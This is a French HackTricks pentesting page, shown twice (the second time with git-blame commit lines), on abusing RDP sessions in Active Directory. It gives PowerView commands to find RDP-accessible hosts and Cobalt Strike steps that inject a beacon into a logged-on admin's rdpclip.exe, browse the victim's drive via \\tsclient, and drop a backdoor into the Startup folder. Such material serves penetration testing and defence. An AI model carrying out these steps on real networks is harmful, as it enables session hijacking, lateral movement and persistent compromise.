hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

## Abus de sessions RDP

Si le **groupe externe** a **accès RDP** à n'importe quel **ordinateur** dans le domaine actuel, un **attaquant** pourrait **compromettre cet ordinateur et attendre**.

Une fois que cet utilisateur a accédé via RDP, l'**attaquant peut pivoter vers la session de cet utilisateur** et abuser de ses permissions dans le domaine externe.
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
Vérifiez **d'autres façons de voler des sessions avec d'autres outils** [**sur cette page.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)

## RDPInception

Si un utilisateur accède via **RDP à une machine** où un **attaquant** l'**attend**, l'attaquant pourra **injecter un beacon dans la session RDP de l'utilisateur** et si la **victime a monté son disque** lors de l'accès via RDP, l'**attaquant pourrait y accéder**.

Dans ce cas, vous pourriez simplement **compromettre** l'**ordinateur d'origine de la victime** en écrivant une **backdoor dans le dossier de démarrage**.
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     02/10/2021 04:11:30   $Recycle.Bin
          dir     02/10/2021 03:23:44   Boot
          dir     02/20/2021 10:15:23   Config.Msi
          dir     10/18/2016 01:59:39   Documents and Settings
          [...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !

- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)

- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to French 2023-06-03 13:10:46 +00:00			`## Abus de sessions RDP`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Si le groupe externe a accès RDP à n'importe quel ordinateur dans le domaine actuel, un attaquant pourrait compromettre cet ordinateur et attendre.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Une fois que cet utilisateur a accédé via RDP, l'attaquant peut pivoter vers la session de cet utilisateur et abuser de ses permissions dans le domaine externe.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00			```powershell
			`# Supposing the group "External Users" has RDP access in the current domain`
			`## lets find where they could access`
			`## The easiest way would be with bloodhound, but you could also run:`
			`Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" \| select -expand ComputerName`
			`#or`
			`Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" \| select -expand ComputerName`

			`# Then, compromise the listed machines, and wait til someone from the external domain logs in:`
			`net logons`
			`Logged on users at \\localhost:`
			`EXT\super.admin`

			`# With cobalt strike you could just inject a beacon inside of the RDP process`
			`beacon> ps`
			`PID PPID Name Arch Session User`
			`--- ---- ---- ---- ------- -----`
			`...`
			`4960 1012 rdpclip.exe x64 3 EXT\super.admin`

			`beacon> inject 4960 x64 tcp-local`
			`## From that beacon you can just run powerview modules interacting with the external domain as that user`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`Vérifiez d'autres façons de voler des sessions avec d'autres outils [sur cette page.](../../network-services-pentesting/pentesting-rdp.md#session-stealing)`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`## RDPInception`

Translated to French 2023-06-03 13:10:46 +00:00			`Si un utilisateur accède via RDP à une machine où un attaquant l'attend, l'attaquant pourra injecter un beacon dans la session RDP de l'utilisateur et si la victime a monté son disque lors de l'accès via RDP, l'attaquant pourrait y accéder.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Dans ce cas, vous pourriez simplement compromettre l'ordinateur d'origine de la victime en écrivant une backdoor dans le dossier de démarrage.`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00			```powershell
			`# Wait til someone logs in:`
			`net logons`
			`Logged on users at \\localhost:`
			`EXT\super.admin`

			`# With cobalt strike you could just inject a beacon inside of the RDP process`
			`beacon> ps`
			`PID PPID Name Arch Session User`
			`--- ---- ---- ---- ------- -----`
			`...`
			`4960 1012 rdpclip.exe x64 3 EXT\super.admin`

			`beacon> inject 4960 x64 tcp-local`

			`# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.`
			`## \\tsclient\c is the C: drive on the origin machine of the RDP session`
			`beacon> ls \\tsclient\c`

			`Size Type Last Modified Name`
			`---- ---- ------------- ----`
			`dir 02/10/2021 04:11:30 $Recycle.Bin`
			`dir 02/10/2021 03:23:44 Boot`
			`dir 02/20/2021 10:15:23 Config.Msi`
			`dir 10/18/2016 01:59:39 Documents and Settings`
			`[...]`

			`# Upload backdoor to startup folder`
			`beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`
			`beacon> upload C:\Payloads\pivot.exe`
			```
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Rejoignez le [💬](https://emojipedia.org/speech-balloon/) groupe Discord ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3392] No subject 2022-08-16 00:18:24 +00:00
			`</details>`